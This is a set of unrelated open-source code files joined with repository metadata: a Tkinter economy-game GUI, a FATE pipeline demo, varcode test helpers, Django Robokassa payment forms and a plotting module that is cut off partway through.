        self.esc.callback = callback
        header.pack()
        jobs.pack()
        ok.pack()
        self.esc.pack(fill=tk.X)

    def raise_frame(self, business, unit):
        """Point the escape button at `unit`, rebind hotkeys, and raise."""
        self.esc.destroy()
        # Fixed: unitData.raise_frame requires (business, unit); the old
        # callback passed only the unit.  event=None lets the callable serve
        # as both button command and key binding.
        callback = lambda event=None: self.controller.show_frame("unitData", business, unit)
        self.esc = tk.Button(self, text="[esc] Return to Unit", font=BUTTON_FONT, command=callback)
        self.esc.callback = callback
        self.esc.pack(fill=tk.X)
        self.set_hotkeys()
        self.tkraise()

    def set_hotkeys(self):
        """Swap the root's active hotkeys for this frame's."""
        for hotkey in self.root.hotkeys:
            self.root.unbind(hotkey)
        for hotkey in self.root.dynamic_hotkeys:
            self.root.unbind(hotkey)
        self.root.dynamic_hotkeys = []
        self.root.hotkeys = self.hotkeys
        self.root.bind("<Return>", lambda event: self.create_job())
        self.root.bind("<Escape>", self.esc.callback)

    def get_jobs(self):
        """Return the jobType names of every available job class."""
        from jobs import all_jobs
        job_list = []
        for job in all_jobs():
            job_list.append(job.jobType)
        return job_list

    def create_job(self):
        """Instantiate the selected job type in the current business/unit."""
        from jobs import all_jobs
        jobType = self.job_var.get()
        for job in all_jobs():
            if job.jobType == jobType:
                break
        else:
            # Fixed: previously fell through and built the *last* job type
            # when nothing matched (e.g. no selection made yet).
            return
        # NOTE(review): 10 and 40 look like wage/hours defaults -- confirm.
        new_job = job(10, self.controller.get_business(), self.controller.get_unit(), 40)
        self.root.event_generate("<<refresh>>", when="tail")
class jobData(tk.Frame):
    """Per-job menu: orders, employees chart, and navigation stubs."""

    def __init__(self, parent, controller, root):
        tk.Frame.__init__(self, parent)
        self.controller = controller
        self.root = root
        self.hotkeys = ["o", "e", "<BackSpace>", "<Escape>"]
        self.job = None
        self.jobName = tk.StringVar()
        self.jobName.set("nothing")
        header = tk.Label(self, textvariable=self.jobName, font=TITLE_FONT)
        orders = tk.Button(self, text="(o) Orders", font=BUTTON_FONT, command=lambda: controller.show_frame("ordersMenu"))
        # Production and Ledger buttons have no command yet (placeholders).
        production = tk.Button(self, text="Production", font=BUTTON_FONT)
        employees = tk.Button(self, text="(e) Employees", font=BUTTON_FONT, command=lambda: controller.show_employees(self.job))
        ledger = tk.Button(self, text="Ledger", font=BUTTON_FONT)
        # NOTE(review): "jobsMenu" and "unitMenu" are not registered in
        # key_controller.frames (jobsMenu is commented out), so these commands
        # raise KeyError when used -- confirm intended targets.
        back = tk.Button(self, text="(bsp) Other jobs", font=BUTTON_FONT, command=lambda: controller.show_frame("jobsMenu"))
        units = tk.Button(self, text="(esc) Other units", font=BUTTON_FONT, command=lambda: controller.show_frame("unitMenu"))
        header.pack(fill=tk.X)
        orders.pack(fill=tk.X)
        production.pack(fill=tk.X)
        employees.pack(fill=tk.X)
        ledger.pack(fill=tk.X)
        # NOTE(review): `units` is created but never packed.
        back.pack(fill=tk.X)

    def setJob(self, job):
        """Select the job this frame displays."""
        self.job = job
        self.jobName.set(job.jobType)

    def raise_frame(self, job=None):
        """Optionally switch to `job`, then rebind hotkeys and raise."""
        if job is not None:
            self.setJob(job)
        self.set_hotkeys()
        self.tkraise()

    def set_hotkeys(self):
        """Swap the root's active hotkeys for this frame's."""
        for hotkey in self.root.hotkeys:
            self.root.unbind(hotkey)
        for hotkey in self.root.dynamic_hotkeys:
            self.root.unbind(hotkey)
        self.root.dynamic_hotkeys = []
        self.root.hotkeys = self.hotkeys
        self.root.bind("o", lambda x: self.controller.show_frame("ordersMenu"))
        # self.root.bind("p", lambda x: self.controller.show_production(self.unit))
        self.root.bind("e", lambda x: self.controller.show_employees(self.job))
        self.root.bind("<BackSpace>", lambda x: self.controller.show_frame("jobsMenu"))
        self.root.bind("<Escape>", lambda x: self.controller.show_frame("unitMenu"))
class ordersMenu(tk.Frame):
    """Lists the current job's craft orders and lets the player edit amounts."""
    def __init__(self, parent, controller, root):
        tk.Frame.__init__(self, parent)
        self.controller = controller
        self.root = root
        self.hotkeys = ["n", "<BackSpace>", "<Escape>"]
        # Per-order row frames, rebuilt on every raise_frame() call.
        self.dynamic_entries = []
        header = tk.Label(self, text="Orders", font=TITLE_FONT)
        new_order = tk.Button(self, text="n. New order", font=BUTTON_FONT, command=lambda: controller.show_frame("new_order"))
        self.back = tk.Button(self, text="bsp. Back", font=BUTTON_FONT, command=lambda: controller.show_frame("jobData"))
        self.main = tk.Button(self, text="esc. Back to office", font=BUTTON_FONT, command=lambda: controller.show_frame("main_keyboard"))
        header.pack()
        new_order.pack(fill=tk.X)
        # ``self.back`` is first packed in raise_frame(); only ``main`` shows here.
        self.main.pack()
    def cull_wrong_orders(self, orders):
        """Return only the orders belonging to the currently selected job."""
        culled_orders = []
        for order in orders:
            if order.getJob() == self.controller.get_job():
                culled_orders.append(order)
        return culled_orders
    def raise_frame(self):
        """Rebuild one editable row per order, then show the frame."""
        for entry in self.dynamic_entries:
            entry.destroy()
        char = self.root.getChar()  # NOTE(review): unused -- confirm getChar() has no needed side effect
        job = self.controller.get_job()
        raw_orders = job.getBusiness().getCraftOrders()
        orders = self.cull_wrong_orders(raw_orders)
        for order in orders:
            newFrame = tk.Frame(self)
            newCaption = tk.Label(newFrame, font=BUTTON_FONT, text=d.getMaterials()[order.getProductIndex()] + ":")
            amountVar = tk.StringVar()
            amountVar.set(order.getAmount())
            # Keyboard validation: only integers may be typed into the entry.
            vcmd = (self.register(self.controller.isInt), '%P')
            newEntry = tk.Entry(newFrame, validatecommand=vcmd, validate="key", textvariable=amountVar)
            # set_order_amount(...) is invoked once here; presumably it returns
            # the actual button callback (a callback factory) -- TODO confirm.
            newButton = tk.Button(newFrame, font=BUTTON_FONT, text="Ok", command=self.controller.set_order_amount(order, amountVar))
            newCaption.pack(side=tk.LEFT)
            newEntry.pack(side=tk.LEFT)
            newButton.pack(side=tk.LEFT)
            newFrame.pack()
            self.dynamic_entries.append(newFrame)
        # Re-pack the navigation buttons so they stay below the order rows.
        self.back.pack_forget()
        self.main.pack_forget()
        self.back.pack(fill=tk.X)
        self.main.pack(fill=tk.X)
        self.set_hotkeys()
        self.tkraise()
    def set_hotkeys(self):
        """Remove stale key bindings and install this frame's own."""
        for hotkey in self.root.hotkeys:
            self.root.unbind(hotkey)
        for hotkey in self.root.dynamic_hotkeys:
            self.root.unbind(hotkey)
        self.root.dynamic_hotkeys = []
        self.root.hotkeys = self.hotkeys
        self.root.bind("n", lambda x: self.controller.show_frame("new_order"))
        self.root.bind("<BackSpace>", lambda x: self.controller.show_frame("jobData"))
        self.root.bind("<Escape>", lambda x: self.controller.show_frame("main_keyboard"))
class new_order(tk.Frame):
    """Form for creating a new craft order for the current job."""
    def __init__(self, parent, controller, root):
        tk.Frame.__init__(self, parent)
        self.controller = controller
        self.root = root
        self.hotkeys = ["<Return>", "<Escape>"]
        header = tk.Label(self, text="Create a new Order", font=TITLE_FONT)
        # Copy so the OptionMenu choices cannot alias the shared materials list.
        products = copy.copy(d.getMaterials())
        self.order_var = tk.StringVar()
        order = tk.OptionMenu(self, self.order_var, *products)
        self.amount_var = tk.StringVar()
        # Keyboard validation: only integers may be typed into the entry.
        vcmd = (self.register(self.controller.isInt), '%P')
        amount = tk.Entry(self, validatecommand=vcmd, validate="key", textvariable=self.amount_var)
        # create_order(...) is evaluated once here; presumably it returns the
        # callback the button invokes (callback factory) -- TODO confirm.
        ok = tk.Button(self, text="OK", font=BUTTON_FONT, command=self.controller.create_order(self.order_var, self.amount_var))
        back = tk.Button(self, text="Back", font=BUTTON_FONT, command=lambda: controller.show_frame("ordersMenu"))
        main = tk.Button(self, text="esc. Back to office", font=BUTTON_FONT, command=lambda: controller.show_frame("main_keyboard"))
        header.pack()
        order.pack()
        amount.pack()
        ok.pack()
        back.pack()
        main.pack()
    def raise_frame(self):
        """Install hotkeys and show this frame."""
        self.set_hotkeys()
        self.tkraise()
    def set_hotkeys(self):
        """Remove stale key bindings and install this frame's own."""
        for hotkey in self.root.hotkeys:
            self.root.unbind(hotkey)
        for hotkey in self.root.dynamic_hotkeys:
            self.root.unbind(hotkey)
        self.root.dynamic_hotkeys = []
        self.root.hotkeys = self.hotkeys
        # create_order(...) appears to build a callback, which the binding then
        # invokes via the trailing () -- hence the double call.
        self.root.bind("<Return>", lambda x: self.controller.create_order(self.order_var, self.amount_var)())
        self.root.bind("<Escape>", lambda x: self.controller.show_frame("main_keyboard"))
class market(tk.Frame):
    """Market screen: lists the unit's transfer orders (sales lines)."""
    def __init__(self, parent, controller, root):
        tk.Frame.__init__(self, parent)
        self.controller = controller
        self.root = root
        self.hotkeys = ["n", "<Escape>"]
        # Per-order row frames, rebuilt on every raise_frame() call.
        self.dynamic_entries = []
        header = tk.Label(self, text="Market", font=TITLE_FONT)
        new_order = tk.Button(self, text="n. New sales line", font=BUTTON_FONT, command=lambda: controller.show_frame("new_transfer"))
        self.back = tk.Button(self, text="Back", font=BUTTON_FONT, command=lambda: controller.show_frame("unitData"))
        self.main = tk.Button(self, text="esc. Back to office", font=BUTTON_FONT, command=lambda: controller.show_frame("main_keyboard"))
        header.pack()
        new_order.pack(fill=tk.X)
        self.back.pack(fill=tk.X)
        self.main.pack(fill=tk.X)
    def raise_frame(self):
        """Rebuild one editable row per transfer order, then show the frame."""
        for entry in self.dynamic_entries:
            entry.destroy()
        char = self.root.getChar()  # NOTE(review): unused -- confirm getChar() has no needed side effect
        # The unit's first job acts as its manager; cull_wrong_orders relies
        # on self.manager being assigned here before it runs.
        self.manager = self.controller.get_unit().getJobList()[0]
        raw_orders = self.manager.getBusiness().getTransferOrders()
        orders = self.cull_wrong_orders(raw_orders)
        for order in orders:
            newFrame = tk.Frame(self)
            newCaption = tk.Label(newFrame, font=BUTTON_FONT, text=d.getMaterials()[order.getProductIndex()] + ":")
            amountVar = tk.StringVar()
            amountVar.set(order.getAmount())
            # Keyboard validation: only integers may be typed into the entry.
            vcmd = (self.register(self.controller.isInt), '%P')
            newEntry = tk.Entry(newFrame, validatecommand=vcmd, validate="key", textvariable=amountVar)
            # set_order_amount(...) is invoked once here; presumably it returns
            # the actual button callback (a callback factory) -- TODO confirm.
            newButton = tk.Button(newFrame, font=BUTTON_FONT, text="Ok", command=self.controller.set_order_amount(order, amountVar))
            newCaption.pack(side=tk.LEFT)
            newEntry.pack(side=tk.LEFT)
            newButton.pack(side=tk.LEFT)
            newFrame.pack()
            self.dynamic_entries.append(newFrame)
        # Re-pack the navigation buttons so they stay below the order rows.
        self.back.pack_forget()
        self.main.pack_forget()
        self.back.pack(fill=tk.X)
        self.main.pack(fill=tk.X)
        self.set_hotkeys()
        self.tkraise()
    def cull_wrong_orders(self, orders):
        """Return only orders belonging to this unit's manager (set in raise_frame)."""
        culled_orders = []
        for order in orders:
            if order.getJob() == self.manager:
                culled_orders.append(order)
        return culled_orders
    def set_hotkeys(self):
        """Remove stale key bindings and install this frame's own."""
        for hotkey in self.root.hotkeys:
            self.root.unbind(hotkey)
        for hotkey in self.root.dynamic_hotkeys:
            self.root.unbind(hotkey)
        self.root.dynamic_hotkeys = []
        self.root.hotkeys = self.hotkeys
        self.root.bind("n", lambda x: self.controller.show_frame("new_transfer"))
        # self.root.bind("<BackSpace>", lambda x: self.controller.show_frame("unitData"))
        self.root.bind("<Escape>", lambda x: self.controller.show_frame("main_keyboard"))
class new_transfer(tk.Frame):
    """Form for creating a new transfer order (sales line) for the current unit."""
    def __init__(self, parent, controller, root):
        tk.Frame.__init__(self, parent)
        self.controller = controller
        self.root = root
        self.hotkeys = ["<Return>", "<Escape>"]
        header = tk.Label(self, text="New Product Line", font=TITLE_FONT)
        # Copy so the OptionMenu choices cannot alias the shared materials list.
        products = copy.copy(d.getMaterials())
        self.order_var = tk.StringVar()
        order = tk.OptionMenu(self, self.order_var, *products)
        self.amount_var = tk.StringVar()
        # Keyboard validation: only integers may be typed into the entry.
        vcmd = (self.register(self.controller.isInt), '%P')
        amount = tk.Entry(self, validatecommand=vcmd, validate="key", textvariable=self.amount_var)
        # create_transfer(...) is evaluated once here; it returns the callback
        # the button invokes (callback factory).
        ok = tk.Button(self, text="OK", font=BUTTON_FONT, command=self.controller.create_transfer(self.order_var, self.amount_var))
        back = tk.Button(self, text="Back", font=BUTTON_FONT, command=lambda: controller.show_frame("market"))
        main = tk.Button(self, text="esc. Back to office", font=BUTTON_FONT, command=lambda: controller.show_frame("main_keyboard"))
        header.pack()
        order.pack()
        amount.pack()
        ok.pack()
        back.pack()
        main.pack()
    def raise_frame(self):
        """Install hotkeys and show this frame."""
        self.set_hotkeys()
        self.tkraise()
    def set_hotkeys(self):
        """Remove stale key bindings and install this frame's own."""
        for hotkey in self.root.hotkeys:
            self.root.unbind(hotkey)
        for hotkey in self.root.dynamic_hotkeys:
            self.root.unbind(hotkey)
        self.root.dynamic_hotkeys = []
        self.root.hotkeys = self.hotkeys
        # BUG FIX: <Return> previously invoked create_order (copy-paste from
        # new_order); this frame creates transfers, matching the OK button.
        self.root.bind("<Return>", lambda x: self.controller.create_transfer(self.order_var, self.amount_var)())
        self.root.bind("<Escape>", lambda x: self.controller.show_frame("main_keyboard"))
class house(tk.Frame):
    """Placeholder screen for the player's home."""
    def __init__(self, parent, controller, root):
        tk.Frame.__init__(self, parent)
        self.controller = controller
        self.root = root
        self.hotkeys = ["<Escape>"]
        widgets = (
            tk.Label(self, text="Home", font=TITLE_FONT),
            tk.Button(self, text="(esc) Back to office", font=BUTTON_FONT,
                      command=lambda: controller.show_frame("main_keyboard")),
        )
        for widget in widgets:
            widget.pack(fill=tk.X)
    def raise_frame(self):
        """Install hotkeys and bring this frame forward."""
        self.set_hotkeys()
        self.tkraise()
    def set_hotkeys(self):
        """Clear old bindings and register this frame's Escape handler."""
        stale = self.root.hotkeys + self.root.dynamic_hotkeys
        for key in stale:
            self.root.unbind(key)
        self.root.dynamic_hotkeys = []
        self.root.hotkeys = self.hotkeys
        self.root.bind("<Escape>", lambda x: self.controller.show_frame("main_keyboard"))
class town(tk.Frame):
    """Placeholder screen for the town view."""
    def __init__(self, parent, controller, root):
        tk.Frame.__init__(self, parent)
        self.controller = controller
        self.root = root
        self.hotkeys = ["<Escape>"]
        title = tk.Label(self, text="Town", font=TITLE_FONT)
        office_btn = tk.Button(
            self,
            text="(esc) Back to office",
            font=BUTTON_FONT,
            command=lambda: controller.show_frame("main_keyboard"),
        )
        title.pack(fill=tk.X)
        office_btn.pack(fill=tk.X)
    def raise_frame(self):
        """Install hotkeys and bring this frame forward."""
        self.set_hotkeys()
        self.tkraise()
    def set_hotkeys(self):
        """Clear old bindings and register this frame's Escape handler."""
        root = self.root
        for key in root.hotkeys:
            root.unbind(key)
        for key in root.dynamic_hotkeys:
            root.unbind(key)
        root.dynamic_hotkeys = []
        root.hotkeys = self.hotkeys
        root.bind("<Escape>", lambda x: self.controller.show_frame("main_keyboard"))
class quitBar(tk.Frame):
    """Bottom bar with the next-day and quit controls."""
    def __init__(self, parent, root, *args, **kwargs):
        tk.Frame.__init__(self, parent, *args, **kwargs)
        self.root = root
        # Renamed from ``exit`` to avoid shadowing the builtin.
        quit_button = tk.Button(self, text="Quit", font=BUTTON_FONT, command=self.quit)
        next_turn = tk.Button(self, text="[F1] Next day", font=BUTTON_FONT, command=self.next_day)
        self.root.bind("<F1>", self.next_day)
        next_turn.pack(fill=tk.X)
        quit_button.pack(fill=tk.X)
    def next_day(self, event=None):
        """Clear the text log and advance the simulation one day."""
        char = self.root.getChar()
        self.root.text_cont.clear()
        char.run_day()
    def quit(self):
        """Shut down the Tk main loop."""
        self.root.quit()
|
{
"content_hash": "a267811e385022f7c11128c003db6fa0",
"timestamp": "",
"source": "github",
"line_count": 1476,
"max_line_length": 147,
"avg_line_length": 33.6890243902439,
"alnum_prop": 0.5939668174962293,
"repo_name": "markemus/economy",
"id": "27c0b6c1857256ba17c4e094893c03714673225e",
"size": "49725",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gui/old_gui.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "298539"
}
],
"symlink_target": ""
}
|
import argparse
from pipeline.backend.pipeline import PipeLine
from pipeline.component import DataTransform
from pipeline.component import Reader
from pipeline.interface import Data
from pipeline.utils.tools import load_job_config
def main(config="../../config.yaml", namespace=""):
    """Build and run a guest/host data-transform pipeline (tag-with-value host input)."""
    # Accept either a config object or a path to a YAML job config.
    if isinstance(config, str):
        config = load_job_config(config)
    guest_party = config.parties.guest[0]
    host_party = config.parties.host[0]

    guest_table = {"name": "breast_hetero_guest", "namespace": f"experiment{namespace}"}
    host_table = {"name": "tag_value_1000_140", "namespace": f"experiment{namespace}"}

    # Guest initiates the job; both parties participate.
    job = PipeLine().set_initiator(role='guest', party_id=guest_party).set_roles(guest=guest_party, host=host_party)

    reader_0 = Reader(name="reader_0")
    reader_0.get_party_instance(role='guest', party_id=guest_party).component_param(table=guest_table)
    reader_0.get_party_instance(role='host', party_id=host_party).component_param(table=host_table)

    data_transform_0 = DataTransform(name="data_transform_0")
    data_transform_0.get_party_instance(role='guest', party_id=guest_party).component_param(with_label=True)
    # Host data is unlabeled and arrives in "tag:value" format.
    data_transform_0.get_party_instance(role='host', party_id=host_party).component_param(
        with_label=False, input_format="tag", tag_with_value=True)

    job.add_component(reader_0)
    job.add_component(data_transform_0, data=Data(data=reader_0.output.data))
    job.compile()
    job.fit()
if __name__ == "__main__":
    parser = argparse.ArgumentParser("PIPELINE DEMO")
    parser.add_argument("-config", type=str, help="config file")
    args = parser.parse_args()
    # Fall back to the default config path when -config is omitted.
    if args.config is None:
        main()
    else:
        main(args.config)
|
{
"content_hash": "ae982ed71ce432d2081cc81d24beb8a2",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 104,
"avg_line_length": 38.52,
"alnum_prop": 0.6339563862928349,
"repo_name": "FederatedAI/FATE",
"id": "776b3b07cef130376e2a066d235e80c9d4571cd5",
"size": "2543",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/pipeline/data_transform/pipeline-data-transform-tag-value.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Lua",
"bytes": "19716"
},
{
"name": "Python",
"bytes": "5121767"
},
{
"name": "Rust",
"bytes": "3971"
},
{
"name": "Shell",
"bytes": "19676"
}
],
"symlink_target": ""
}
|
"""
Helper functions and shared datasets for tests
"""
from __future__ import print_function, division, absolute_import
import os
from varcode import Variant, VariantCollection
from pyensembl import ensembl_grch38
def data_path(name):
    """
    Return the absolute path to a file in the varcode/test/data directory.

    The name specified should be relative to varcode/test/data.
    """
    base_dir = os.path.dirname(__file__)
    return os.path.join(base_dir, "data", name)
# BRAF variant coordinates from COSMIC entry:
# http://cancer.sanger.ac.uk/cosmic/mutation/overview?id=476
braf_V600E_variant = Variant(7, 140753336, "A", "T", ensembl_grch38)
# TP53 variant coordinates from COSMIC entry:
# http://cancer.sanger.ac.uk/cosmic/mutation/overview?id=10656
tp53_R248W_variant = Variant(17, 7674221, "G", "A", ensembl_grch38)
# Shared two-variant collection used across the cancer-variant tests.
cancer_test_variants = VariantCollection([
    braf_V600E_variant,
    tp53_R248W_variant
])
# All gene ids touched by the test variants.
cancer_test_variant_gene_ids = {
    gene_id
    for v in cancer_test_variants
    for gene_id in v.gene_ids
}
# All transcript ids touched by the test variants.
cancer_test_variant_transcript_ids = {
    transcript_id
    for v in cancer_test_variants
    for transcript_id in v.transcript_ids
}
|
{
"content_hash": "a58f265ccdfb05eeafade57695822307",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 74,
"avg_line_length": 27.523809523809526,
"alnum_prop": 0.7231833910034602,
"repo_name": "hammerlab/topiary",
"id": "d2f9d3fd6034717ea44b56bae635053c0f95d8d2",
"size": "1760",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/data.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "98498"
},
{
"name": "Shell",
"bytes": "154"
}
],
"symlink_target": ""
}
|
from hashlib import md5
from urllib import urlencode
from django import forms
from robokassa.conf import LOGIN, PASSWORD1, PASSWORD2, TEST_MODE
from robokassa.conf import STRICT_CHECK, FORM_TARGET, EXTRA_PARAMS
from robokassa.models import SuccessNotification
class BaseRobokassaForm(forms.Form):
    """Shared behavior for Robokassa forms: extra 'shp' params and MD5 signatures."""
    def __init__(self, *args, **kwargs):
        super(BaseRobokassaForm, self).__init__(*args, **kwargs)
        # Create the additional user-defined fields ('shp' + name, per the
        # Robokassa protocol for custom shop parameters).
        for key in EXTRA_PARAMS:
            self.fields['shp'+key] = forms.CharField(required=False)
            if 'initial' in kwargs:
                # NOTE(review): the fallback is the *string* 'None', not the
                # None object -- looks suspicious; confirm it is intended.
                self.fields['shp'+key].initial = kwargs['initial'].get(key, 'None')
    def _append_extra_part(self, standard_part, value_func):
        # Append "shpKEY=VALUE" pairs to the signature string, colon-separated.
        extra_part = ":".join(["%s=%s" % ('shp'+key, value_func('shp' + key)) for key in EXTRA_PARAMS])
        if extra_part:
            return ':'.join([standard_part, extra_part])
        return standard_part
    def extra_params(self):
        """Return a dict of the cleaned extra 'shp' parameter values."""
        extra = {}
        for param in EXTRA_PARAMS:
            if ('shp'+param) in self.cleaned_data:
                extra[param] = self.cleaned_data['shp'+param]
        return extra
    def _get_signature(self):
        # Upper-case MD5 hex digest, as Robokassa expects.
        return md5(self._get_signature_string()).hexdigest().upper()
    def _get_signature_string(self):
        # Subclasses define which fields participate in the signature.
        raise NotImplementedError
class RobokassaForm(BaseRobokassaForm):
    """Payment form rendered to the user and submitted (or redirected) to Robokassa."""
    # merchant login at the exchange service
    MrchLogin = forms.CharField(max_length=20, initial = LOGIN)
    # amount to be received
    OutSum = forms.DecimalField(min_value=0, max_digits=20, decimal_places=2, required=False)
    # invoice number in the shop (must be unique per shop)
    InvId = forms.IntegerField(min_value=0, required=False)
    # purchase description
    Desc = forms.CharField(max_length=100, required=False)
    # MD5 checksum
    SignatureValue = forms.CharField(max_length=32)
    # suggested payment currency
    IncCurrLabel = forms.CharField(max_length = 10, required=False)
    # user's e-mail
    Email = forms.CharField(max_length=100, required=False)
    # language for client communication (en or ru)
    Culture = forms.CharField(max_length=10, required=False)
    # URL the form should be submitted to.
    # Handy for use in templates.
    target = FORM_TARGET
    def __init__(self, *args, **kwargs):
        super(RobokassaForm, self).__init__(*args, **kwargs)
        if TEST_MODE is True:
            self.fields['isTest'] = forms.BooleanField(required=False)
            self.fields['isTest'].initial = 1
        # hidden widgets by default
        for field in self.fields:
            self.fields[field].widget = forms.HiddenInput()
        self.fields['SignatureValue'].initial = self._get_signature()
    def get_redirect_url(self):
        """ Build a URL with GET parameters matching the form field values.
        Redirecting to the address returned by this method is equivalent to
        submitting the form manually via GET.
        """
        def _initial(name, field):
            val = self.initial.get(name, field.initial)
            if not val:
                return val
            # Robokassa expects windows-1251 encoded values (Python 2 API).
            return unicode(val).encode('1251')
        fields = [(name, _initial(name, field))
                  for name, field in self.fields.items()
                  if _initial(name, field)
                  ]
        params = urlencode(fields)
        return self.target+'?'+params
    def _get_signature_string(self):
        # Field order is fixed by the protocol: login:sum:invoice:password1.
        def _val(name):
            value = self.initial[name] if name in self.initial else self.fields[name].initial
            if value is None:
                return ''
            return unicode(value)
        standard_part = ':'.join([_val('MrchLogin'), _val('OutSum'), _val('InvId'), PASSWORD1])
        return self._append_extra_part(standard_part, _val)
class ResultURLForm(BaseRobokassaForm):
    '''Form that receives payment results and verifies the checksum '''
    OutSum = forms.CharField(max_length=15)
    InvId = forms.IntegerField(min_value=0)
    SignatureValue = forms.CharField(max_length=32)
    def clean(self):
        # Reject the notification unless its signature matches ours.
        try:
            signature = self.cleaned_data['SignatureValue'].upper()
            if signature != self._get_signature():
                raise forms.ValidationError(u'Ошибка в контрольной сумме')
        except KeyError:
            raise forms.ValidationError(u'Пришли не все необходимые параметры')
        return self.cleaned_data
    def _get_signature_string(self):
        # ResultURL signatures use PASSWORD2 (server-to-server notification).
        _val = lambda name: unicode(self.cleaned_data[name])
        standard_part = ':'.join([_val('OutSum'), _val('InvId'), PASSWORD2])
        return self._append_extra_part(standard_part, _val)
class _RedirectPageForm(ResultURLForm):
    """Form that verifies the checksum on the Success redirect page."""
    Culture = forms.CharField(max_length=10)

    def _get_signature_string(self):
        # Redirect-page signatures use PASSWORD1, unlike ResultURL (PASSWORD2).
        def _val(name):
            return unicode(self.cleaned_data[name])
        signature_base = ':'.join([_val('OutSum'), _val('InvId'), PASSWORD1])
        return self._append_extra_part(signature_base, _val)
class SuccessRedirectForm(_RedirectPageForm):
    """ Form for handling the Success page with extra protection.

    Verifies that ROBOKASSA already notified the system about the payment
    by sending a request to ResultURL beforehand. """
    def clean(self):
        data = super(SuccessRedirectForm, self).clean()
        if STRICT_CHECK:
            # .exists() issues a cheap EXISTS query instead of fetching rows
            # just to test queryset truthiness.
            if not SuccessNotification.objects.filter(InvId=data['InvId']).exists():
                raise forms.ValidationError(u'От ROBOKASSA не было предварительного уведомления')
        return data
class FailRedirectForm(BaseRobokassaForm):
    '''Form that receives results for the redirect to the Fail page'''
    OutSum = forms.CharField(max_length=15)
    InvId = forms.IntegerField(min_value=0)
    Culture = forms.CharField(max_length=10)
|
{
"content_hash": "f0daaf22f4b7693ea3efaabad61b181c",
"timestamp": "",
"source": "github",
"line_count": 164,
"max_line_length": 103,
"avg_line_length": 35.96951219512195,
"alnum_prop": 0.6484149855907781,
"repo_name": "kmike/django-robokassa",
"id": "0c1a2841ffb8e29c0470a6411c48e2338ade7fc4",
"size": "6716",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "robokassa/forms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "20800"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, division, print_function
from os.path import join
from plottool import draw_func2 as df2
import numpy as np
import os
import utool
# utool injects module-scoped print/debug/profile helpers.
print, print_, printDBG, rrr, profile = utool.inject(__name__, '[viz_allres]', DEBUG=False)
# Global variables
BROWSE = True   # show figures interactively
DUMP = False    # save figures to disk
FIGNUM = 1      # matplotlib figure number shared by all plots
def plot_rank_stem(allres, orgres_type='true'):
    """Stem plot of groundtruth chip rank per query chip index."""
    print('[viz] plotting rank stem')
    # Visualize rankings with the stem plot
    ibs = allres.ibs
    title = orgres_type + 'rankings stem plot\n' + allres.title_suffix
    orgres = allres.__dict__[orgres_type]
    df2.figure(fnum=FIGNUM, doclf=True, title=title)
    x_data = orgres.qcxs
    y_data = orgres.ranks
    df2.draw_stems(x_data, y_data)
    # Thin the x ticks logarithmically with the number of queries.
    slice_num = int(np.ceil(np.log10(len(orgres.qcxs))))
    df2.set_xticks(ibs.test_sample_cx[::slice_num])
    df2.set_xlabel('query chip indeX (qcx)')
    df2.set_ylabel('groundtruth chip ranks')
    #df2.set_yticks(list(seen_ranks))
    __dump_or_browse(allres.ibs, 'rankviz')
def plot_rank_histogram(allres, orgres_type):
    """Histogram of groundtruth ranks for the given organized-result type."""
    print('[viz] plotting %r rank histogram' % orgres_type)
    ranks = allres.__dict__[orgres_type].ranks
    label = 'P(rank | ' + orgres_type + ' match)'
    title = orgres_type + ' match rankings histogram\n' + allres.title_suffix
    df2.figure(fnum=FIGNUM, doclf=True, title=title)
    df2.draw_histpdf(ranks, label=label)  # FIXME
    df2.set_xlabel('ground truth ranks')
    df2.set_ylabel('frequency')
    df2.legend()
    __dump_or_browse(allres.ibs, 'rankviz')
def plot_score_pdf(allres, orgres_type, colorx=0.0, variation_truncate=False):
    """Plot the score distribution for one organized-result type.

    Args:
        allres: aggregated results object.
        orgres_type: key into allres.__dict__ ('true', 'false', ...).
        colorx: color index forwarded to the plotter.
        variation_truncate: clip the x-range to the bulk of the distribution.
    """
    print('[viz] plotting ' + orgres_type + ' score pdf')
    title = orgres_type + ' match score frequencies\n' + allres.title_suffix
    scores = allres.__dict__[orgres_type].scores
    print('[viz] len(scores) = %r ' % (len(scores),))
    label = 'P(score | %r)' % orgres_type
    df2.figure(fnum=FIGNUM, doclf=True, title=title)
    df2.draw_pdf(scores, label=label, colorx=colorx)
    if variation_truncate:
        df2.variation_trunctate(scores)
    #df2.variation_trunctate(false.scores)
    df2.set_xlabel('score')
    df2.set_ylabel('frequency')
    df2.legend()
    __dump_or_browse(allres.ibs, 'scoreviz')
def plot_score_matrix(allres):
    """Show the full query-vs-database score matrix as a colormapped image."""
    print('[viz] plotting score matrix')
    score_matrix = allres.score_matrix
    title = 'Score Matrix\n' + allres.title_suffix
    # Find inliers
    #inliers = util.find_std_inliers(score_matrix)
    #max_inlier = score_matrix[inliers].max()
    # Truncate above 255
    score_img = np.copy(score_matrix)
    #score_img[score_img < 0] = 0
    #score_img[score_img > 255] = 255
    #dim = 0
    #score_img = util.norm_zero_one(score_img, dim=dim)
    # Make colors
    scores = score_img.flatten()
    colors = df2.scores_to_color(scores, logscale=True)
    cmap = df2.scores_to_cmap(scores, colors)
    df2.figure(fnum=FIGNUM, doclf=True, title=title)
    # Show score matrix
    df2.imshow(score_img, fnum=FIGNUM, cmap=cmap)
    # Colorbar
    df2.colorbar(scores, colors)
    df2.set_xlabel('database')
    df2.set_ylabel('queries')
    #__dump_or_browse(allres.ibs, 'scoreviz')
# Dump logic
def __browse():
    """Display the current matplotlib figure interactively."""
    print('[viz] Browsing Image')
    df2.show()
def save_if_requested(ibs, subdir):
    """Save the current figure under the result dir when --save-figures is set.

    Args:
        ibs: controller object carrying ``args`` and ``dirs``.
        subdir: optional subdirectory name; sanitized and created on demand.
    """
    if not ibs.args.save_figures:
        return
    fpath = ibs.dirs.result_dir
